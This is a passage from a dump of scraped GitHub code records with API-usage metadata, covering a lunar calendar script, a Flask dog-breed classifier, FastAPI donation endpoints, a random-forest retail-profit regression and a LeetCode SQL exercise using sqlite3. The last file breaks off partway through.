"sklearn.metrics.mean_squared_error", "line_number": 210, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 210, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 215, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 222, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 223, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 225, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 227, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 230, "usage_type": 
"call"}, {"api_name": "sklearn.metrics", "line_number": 230, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 231, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 231, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 242, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 245, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 246, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 247, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 249, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 251, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 254, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 254, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 257, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 265, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 268, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 269, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 272, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 274, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 277, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 278, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 278, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 286, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", 
"line_number": 289, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 290, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 291, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 293, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 295, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 298, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 298, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 299, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 307, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 307, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 312, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 314, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 315, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 318, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 318, "usage_type": "name"}]} +{"seq_id": "42656835365", "text": "import calendar\nfrom calendar import Calendar\n\nimport lunardate\n\nfrom common.JieQi.SolarTerms import getjieqi_info\n\ncalendar.setfirstweekday(firstweekday=6)\nprint(calendar.month(2019, 11))\ncalendar_items = calendar.monthcalendar(2019, 11)\nprint(calendar_items)\n\nca = Calendar(firstweekday=6)\niter_month = ca.itermonthdates(2019, 11)\nfor month in iter_month:\n print(month)\n\nday_info_dic = {\n 1: \"初一\",\n 2: \"初二\",\n 3: \"初三\",\n 4: \"初四\",\n 5: \"初五\",\n 6: \"初六\",\n 7: \"初七\",\n 8: \"初八\",\n 9: \"初九\",\n 10: \"初十\",\n 11: \"十一\",\n 12: \"十二\",\n 13: \"十三\",\n 14: \"十四\",\n 15: \"十五\",\n 16: \"十六\",\n 17: \"十七\",\n 18: \"十八\",\n 19: \"十九\",\n 20: \"二十\",\n 21: \"二十一\",\n 22: \"二十二\",\n 23: \"二十三\",\n 24: \"二十四\",\n 26: \"二十六\",\n 25: \"二十五\",\n 27: \"二十七\",\n 28: \"二十八\",\n 29: \"二十九\",\n 30: \"三十\",\n 31: \"三十一\",\n 32: \"三十二\",\n}\n\n\ndef monthdatescalendar_info(year, month):\n jieqi_data = getjieqi_info(year)\n day_date_items = ca.monthdatescalendar(year, month)\n for day_date_list in day_date_items:\n for day_date in day_date_list:\n yinlidate = lunardate.LunarDate.fromSolarDate(day_date.year, day_date.month, day_date.day)\n if day_date.month == month:\n disable = 0\n else:\n disable = 1\n print(day_date, yinlidate, day_info_dic[yinlidate.day], disable, jieqi_data.get(str(day_date), \"\"))\n\n\nfor i in range(12):\n print(i)\n monthdatescalendar_info(2020, i + 1)\n", "repo_name": "ocswor/clendar_backend", "sub_path": "apps/common/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "calendar.setfirstweekday", 
"line_number": 8, "usage_type": "call"}, {"api_name": "calendar.month", "line_number": 9, "usage_type": "call"}, {"api_name": "calendar.monthcalendar", "line_number": 10, "usage_type": "call"}, {"api_name": "calendar.Calendar", "line_number": 13, "usage_type": "call"}, {"api_name": "common.JieQi.SolarTerms.getjieqi_info", "line_number": 55, "usage_type": "call"}, {"api_name": "lunardate.LunarDate.fromSolarDate", "line_number": 59, "usage_type": "call"}, {"api_name": "lunardate.LunarDate", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "72851785474", "text": "from flask import Flask, render_template, request\nimport io\nfrom keras.preprocessing import image\nfrom keras.models import model_from_json\nimport json\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\nwith open('static/breeds.json') as f:\n\tdog_names = json.load(f)\n\tprint(dog_names)\n\ndef path_to_tensor(img_path):\n # loads RGB image as PIL.Image.Image type\n img = image.load_img(img_path, target_size=(224, 224))\n # convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)\n x = image.img_to_array(img)\n # convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor\n return np.expand_dims(x, axis=0)\n\ndef extract_Xception(tensor):\n\tfrom keras.applications.xception import Xception, preprocess_input\n\treturn Xception(weights='../saved_models/imagenet.h5', include_top=False).predict(preprocess_input(tensor))\n\ndef predict_breed_Xception(img_path): \t\n\tjson_file = open('../saved_models/Xception.json', 'r')\n\tmodel_json = json_file.read()\n\tjson_file.close()\n\tmodel = model_from_json(model_json)\n\t# load weights into new model\n\tmodel.load_weights(\"../saved_models/weights.best.Xception.hdf5\")\n\tbottleneck_feature = extract_Xception(path_to_tensor(img_path))\n\n\tpredicted_vector = model.predict(bottleneck_feature)\n\n\tpredicted_index = np.argmax(predicted_vector)\n\tlabel = dog_names[predicted_index]\n\treturn label, predicted_vector\n\n@app.route('/')\ndef main():\n return render_template('app.html')\n\n@app.route('/upload', methods = ['POST'])\ndef upload():\n file = request.files['file']\n\n filename = secure_filename(file.filename)\n path = os.path.join('static/', filename)\n file.save(path)\n label, vector = predict_breed_Xception(path)\n os.remove(path)\n\n res = dict(prediction = label)\n\n return json.dumps(res)\n", "repo_name": "jakubkocvara/Dog-Breed-Classifier", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 18, "usage_type": "name"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.applications.xception.Xception", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.applications.xception.preprocess_input", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.models.model_from_json", "line_number": 32, "usage_type": "call"}, 
{"api_name": "numpy.argmax", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "35368855898", "text": "from typing import List\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom app.core.db import get_async_session\nfrom app.core.user import current_user, current_superuser\nfrom app.crud.donation import donation_crud\nfrom app.models import User\nfrom app.schemas.donation import DonationDB, DonationCreate, DonationDBUser\nfrom app.services.investment import run_investment_process\n\nrouter = APIRouter()\n\n\n@router.post(\n '/',\n response_model=DonationDBUser,\n response_model_exclude_none=True,\n)\nasync def create_new_donation(\n donation: DonationCreate,\n user: User = Depends(current_user),\n session: AsyncSession = Depends(get_async_session),\n):\n \"\"\"Сделать пожертвование\"\"\"\n new_donation = await donation_crud.create(\n obj_in=donation,\n user=user,\n session=session,\n )\n new_donation = await run_investment_process(\n obj_in=new_donation,\n session=session\n )\n return new_donation\n\n\n@router.get(\n '/',\n response_model=List[DonationDB],\n response_model_exclude_none=True,\n dependencies=[Depends(current_superuser)],\n)\nasync def get_all_donations(\n session: AsyncSession = Depends(get_async_session),\n):\n \"\"\"\n Только для суперюзеров. 
\n    Returns a list of all donations.\n    \"\"\"\n    all_donations = await donation_crud.get_multi(\n        session=session\n    )\n    return all_donations\n\n\n@router.get(\n    '/my',\n    response_model_exclude_none=True,\n    response_model=List[DonationDBUser]\n)\nasync def get_user_donations(\n    user: User = Depends(current_user),\n    session: AsyncSession = Depends(get_async_session),\n):\n    \"\"\"Return the list of donations made by the requesting user.\"\"\"\n    user_donations = await donation_crud.get_by_user(\n        user=user,\n        session=session\n    )\n    return user_donations\n", "repo_name": "iamTroyanskiy/cat_charity_fund", "sub_path": "app/api/endpoints/donation.py", "file_name": "donation.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.APIRouter", "line_number": 13, "usage_type": "call"}, {"api_name": "app.schemas.donation.DonationCreate", "line_number": 22, "usage_type": "name"}, {"api_name": "app.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "app.core.user.current_user", "line_number": 23, "usage_type": "argument"}, {"api_name": "fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 24, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.create", "line_number": 27, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 27, "usage_type": "name"}, {"api_name": "app.services.investment.run_investment_process", "line_number": 32, "usage_type": "call"}, {"api_name": "app.schemas.donation.DonationDBUser", "line_number": 18, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 46, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 46, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 46, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.get_multi", "line_number": 52, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "app.schemas.donation.DonationDB", "line_number": 41, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 43, "usage_type": "call"}, {"api_name": "app.core.user.current_superuser", "line_number": 43, "usage_type": "argument"}, {"api_name": "app.models.User", "line_number": 64, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 65, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 64, "usage_type": "call"}, {"api_name": "app.core.user.current_user", "line_number": 64, "usage_type": "argument"}, {"api_name": "fastapi.Depends", "line_number": 65, "usage_type": "call"}, {"api_name": "app.core.db.get_async_session", "line_number": 65, "usage_type": "argument"}, {"api_name": "app.crud.donation.donation_crud.get_by_user", "line_number": 68, "usage_type": "call"}, {"api_name": "app.crud.donation.donation_crud", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "app.schemas.donation.DonationDBUser", "line_number": 61, "usage_type": "name"}]} +{"seq_id": 
"21834470599", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 2 16:08:13 2022\n\n@author: kasey\n\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Libraries and Definitions\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import metrics\nimport seaborn as sns\n\n#initialize label encoder\nlabel_encoder = preprocessing.LabelEncoder()\n\n#function to plot feature importance\ndef plot_feature_importance(importance,names,model_type):\n\n #Create arrays from feature importance and feature names\n feature_importance = np.array(importance)\n feature_names = np.array(names)\n \n #Create a DataFrame using a Dictionary\n data={'feature_names':feature_names,'feature_importance':feature_importance}\n fi_df = pd.DataFrame(data)\n \n #Sort the DataFrame in order decreasing feature importance\n fi_df.sort_values(by=['feature_importance'], ascending=False,inplace=True)\n \n #Define size of bar plot\n plt.figure(figsize=(10,8))\n #Plot Searborn bar chart\n sns.barplot(x=fi_df['feature_importance'], y=fi_df['feature_names'])\n #Add chart labels\n plt.title(model_type + 'FEATURE IMPORTANCE')\n plt.xlabel('FEATURE IMPORTANCE')\n plt.ylabel('FEATURE NAMES')\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Data\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Read in excel file, changing sheet name when necessary \ndf = pd.read_csv(r'C:\\Users\\kasey\\Documents\\Online_Retail.csv', encoding = 'unicode_escape')\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nData Cleaning\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Change InvoiceDate to InvoiceMonth\ndf['InvoiceMonth'] = pd.DatetimeIndex(df['InvoiceDate']).month\n#Create Profit field for predictions\ndf['Profit'] = df['Quantity'] * df['UnitPrice']\n\n#Remove negative values from Quantity feature (removes ~2% of the data)\ndf = df[df.Quantity >= 0]\n#Create copy of dataframe for results\nfinal_df = df.copy()\n\n#Define the features to be used in the model\ncols_to_keep = ['UnitPrice', 'Country', 'InvoiceMonth', 'Description', 'Profit']\n#Remove unneccessary features\ncluster_df = df[cols_to_keep].copy()\n\n#Label encode the Country and Description fields to be able to use the non-numeric field\ncluster_df['Country'] = label_encoder.fit_transform(cluster_df['Country'])\ncluster_df['Description'] = label_encoder.fit_transform(cluster_df['Description'])\n\n#Save labels and features for feature importance\nlabel = np.array(cluster_df['Profit'])\nfeatures = cluster_df.drop('Profit', axis = 1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nModel Creation\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Create X and y\nX,y = cluster_df.iloc[:,:-1],cluster_df.iloc[:,-1]\n\n#Standardize the dataframe before clsutering\nX_scaled = StandardScaler().fit_transform(X)\n\n#Create training and testing groups, 80-20 split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=123)\n\n#Create Randfom Forest regression model\nregressor = RandomForestRegressor(n_estimators = 100, 
random_state=0)\nregressor.fit(X,y)\n\n#Predict test values, and generate predictions for all rows\ny_pred = regressor.predict(X_test)\nall_predictions = regressor.predict(features)\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nModel Output\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Generate Feature Importance Visualization\nplot_feature_importance(regressor.feature_importances_,X_train.columns, 'RANDOM FOREST')\n\n#Print Mean Absolute Error\nprint('Mean Absolute Error: ' ,metrics.mean_absolute_error(y_test, y_pred))\n\n#Create field to hold predictions for all records instead of just the test set\nfinal_df['Predicted Profit'] = all_predictions\n#Create Fields for determining the actual error from all records\n#Take the absolute value of the difference to determine the actual error\nfinal_df['Difference'] = final_df['Predicted Profit'] - final_df['Profit']\nfinal_df['abs(Difference)'] = final_df['Difference'].abs()\n\n#Print the Mean and Standard Deviation of the entire population of results.\nprint(\"MEAN: \", final_df['abs(Difference)'].mean())\nprint(\"STD DEV: \", final_df['abs(Difference)'].std())\n\nfinal_df.to_excel(\"Online Retail Data with RF Predictions.xlsx\", index=False)\n\n", "repo_name": "clare44macharia/online_retail", "sub_path": "regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "9688324418", "text": "\"\"\"leetcode.com Task 175. 
Combine Two Tables.\n\nTable: Person\n\n+-------------+---------+\n| Column Name | Type    |\n+-------------+---------+\n| personId    | int     |\n| lastName    | varchar |\n| firstName   | varchar |\n+-------------+---------+\npersonId is the primary key column for this table.\nThis table contains information about the ID of some persons and their first and last names.\n\nTable: Address\n\n+-------------+---------+\n| Column Name | Type    |\n+-------------+---------+\n| addressId   | int     |\n| personId    | int     |\n| city        | varchar |\n| state       | varchar |\n+-------------+---------+\naddressId is the primary key column for this table.\nEach row of this table contains information about the city and\nstate of one person with ID = PersonId.\n\n\nWrite an SQL query to report the first name, last name,\ncity, and state of each person in the Person table. If the\naddress of a personId is not present in the Address table,\nreport null instead.\n\nReturn the result table in any order.\n\nThe query result format is in the following example.\n\nInput:\nPerson table:\n+----------+----------+-----------+\n| personId | lastName | firstName |\n+----------+----------+-----------+\n| 1        | Wang     | Allen     |\n| 2        | Alice    | Bob       |\n+----------+----------+-----------+\nAddress table:\n+-----------+----------+---------------+------------+\n| addressId | personId | city          | state      |\n+-----------+----------+---------------+------------+\n| 1         | 2        | New York City | New York   |\n| 2         | 3        | Leetcode      | California |\n+-----------+----------+---------------+------------+\nOutput:\n+-----------+----------+---------------+----------+\n| firstName | lastName | city          | state    |\n+-----------+----------+---------------+----------+\n| Allen     | Wang     | Null          | Null     |\n| Bob       | Alice    | New York City | New York |\n+-----------+----------+---------------+----------+\nExplanation:\nThere is no address in the address table for the personId = 1 so we return null in their city and state.\naddressId = 1 contains information about the address of personId = 2.\n\"\"\"\n\nimport sqlite3\nimport sqlite_querry_functions as sqf\n\n\n\"\"\"\nFILES STRUCTURE:\n\nThe sqlite_querry_functions package is located in the Additional_functions folder\n(sqlite_querry_functions package);\n\nInput and output databases are located in the Databases folder;\n\nText file inputs and outputs are located in the Text_files folder\n\nDatabase names are the same as in the tasks but\nwith the task number at the end, such as Person_175, Address_175 etc.\n\"\"\"\n\n\"\"\"=================\n DEFINITION SECTION\n=================\"\"\"\n\n# please, check the existence of the following folder and files\nDB_dir = 'Databases/'\nDB_input_name = 'leetcode_input.db'\nDB_output_name = 'leetcode_output.db'\n\n\n\"\"\"Filling the input table.\"\"\"\n\n# t_names - the list of the table names\nt_names = ['Person_175', 'Address_175', 'Person_Address_175']\n\n\"\"\"================ Person ================\"\"\"\n\n# Person_175 columns' names and types\nperson_cnt = [['personId', 'INTEGER'],\n              ['lastName', 'TEXT'],\n              ['firstName', 'TEXT']]\n\n# a separate list of column names\nperson_cn = []\nfor cname in person_cnt:\n    person_cn.append(cname[0])\n# end for cname in person_cnt:\n\n# Person_175 table content\n# personId, surname, name\nperson_table = [[1, \"Wang\", \"Allen\"],\n                [2, \"Alice\", \"Bob\"],\n                [3, \"Bond\", \"James\"],\n                [4, \"Shakespeare\", \"William\"]]\n\n\"\"\"================ Address ================\"\"\"\n\n# Address_175 columns' names and types\naddress_cnt = [['addressId', 'INTEGER'],\n               ['personId', 
'INTEGER'],\n               ['city', 'TEXT'],\n               ['state', 'TEXT']]\n\n# a separate list of column names\naddress_cn = []\nfor cname in address_cnt:\n    address_cn.append(cname[0])\n# end for cname in address_cnt:\n\n# Address_175 table content\n# addressId, personId, city, state\naddress_table = [[1, 2, 'Melbourne', 'Victoria'],\n                 [2, 3, 'Sydney', 'NSW'],\n                 [3, 7, 'New York City', 'New York'],\n                 [4, 8, 'Leetcode', 'California'],\n                 [5, 4, 'London', 'Britain']]\n\ncc = 'personId' # common column on which the tables are merged\n\n\"\"\"==============\n INPUT SECTION\n==============\"\"\"\n\ni_p = DB_dir+DB_input_name # input path\n\nwith sqlite3.connect(i_p) as con:\n    cur = con.cursor()\n    # t_names[0] = Person_175\n    cur.execute(\"DROP TABLE IF EXISTS \" + t_names[0])\n\n    SQL_st = sqf.SQL_CREATE_Table(t_names[0]) # row_id column created automatically\n    cur.execute(SQL_st)\n\n    \"\"\" Initiating creation of the structure of t_names[0] = Person_175\"\"\"\n    for column_n_t in person_cnt: # [0] - column name; [1] - column type\n        SQL_st = sqf.SQL_ADD_Column(t_names[0],\n                                    column_n_t[0],\n                                    column_n_t[1])\n        cur.execute(SQL_st)\n    # end for column_n_t in person_cnt:\n\n    \"\"\" The structure of the table Person_175 is completed\"\"\"\n    \"\"\" Initiating the filling of the table.\"\"\"\n\n    for i in range(len(person_table)):\n        SQL_st = sqf.SQL_INSERT_INTO(\n            t_names[0],\n            person_cn,\n            person_table[i])\n        a = sqf.SQL_CV_list(person_cn)\n        b = sqf.SQL_CV_list(person_table[i])\n        cur.execute(SQL_st)\n    # end for i in range(len(person_table)):\n    \"\"\" Person_175 is filled.\"\"\"\n\n    # t_names[1] = Address_175\n    cur.execute(\"DROP TABLE IF EXISTS \" + t_names[1])\n\n    SQL_st = sqf.SQL_CREATE_Table(t_names[1]) # row_id column created automatically\n    cur.execute(SQL_st)\n\n    \"\"\" Initiating creation of the structure of Address_175.\"\"\"\n    for address_n_t in address_cnt: # [0] - column name; [1] - column type\n        SQL_st = sqf.SQL_ADD_Column(t_names[1],\n                                    address_n_t[0],\n                                    address_n_t[1])\n        cur.execute(SQL_st)\n    # end for address_n_t in address_cnt:\n\n    \"\"\" The structure of the table Address_175 is completed\"\"\"\n    \"\"\" Initiating the filling of the table.\"\"\"\n\n    for i in range(len(address_table)):\n        SQL_st = sqf.SQL_INSERT_INTO(\n            t_names[1],\n            address_cn,\n            address_table[i])\n        cur.execute(SQL_st)\n    # end for i in range(len(address_table)):\n    \"\"\" Address_175 is filled.\"\"\"\n\n\"\"\"===============\n OUTPUT SECTION\n===============\"\"\"\n\no_p = DB_dir+DB_output_name # output path\n\ninp = sqlite3.connect(i_p) # must be closed at the end\noutp = sqlite3.connect(o_p) # must be closed at the end\n\n\"\"\" creating table with the results ==============\"\"\"\n\ncuro = outp.cursor()\ncuro.execute(\"DROP TABLE IF EXISTS \" + t_names[2])\n\nSQL_st = sqf.SQL_CREATE_Table(t_names[2]) # row_id column created automatically\ncuro.execute(SQL_st)\n\npc_cnt = person_cnt # creating the list of column names and types\nfor val in address_cnt:\n    if val not in pc_cnt:\n        pc_cnt.append(val)\n    # end if val not in pc_cnt\n# end for val in address_cnt\npc_cnt.remove(pc_cnt[0]) # indices shift after removing an element\npc_cnt.remove(pc_cnt[2])\n\n\"\"\" Initiating creation of the structure of t_names[2] = Person_Address_175\"\"\"\nfor column_n_t in pc_cnt: # [0] - column name; [1] - column type\n    SQL_st = sqf.SQL_ADD_Column(t_names[2],\n                                column_n_t[0],\n                                column_n_t[1])\n    curo.execute(SQL_st)\n# end for column_n_t in pc_cnt:\n\n# a separate list of column names\npc_cn = []\nfor cname in pc_cnt:\n    pc_cn.append(cname[0])\n# end for cname in 
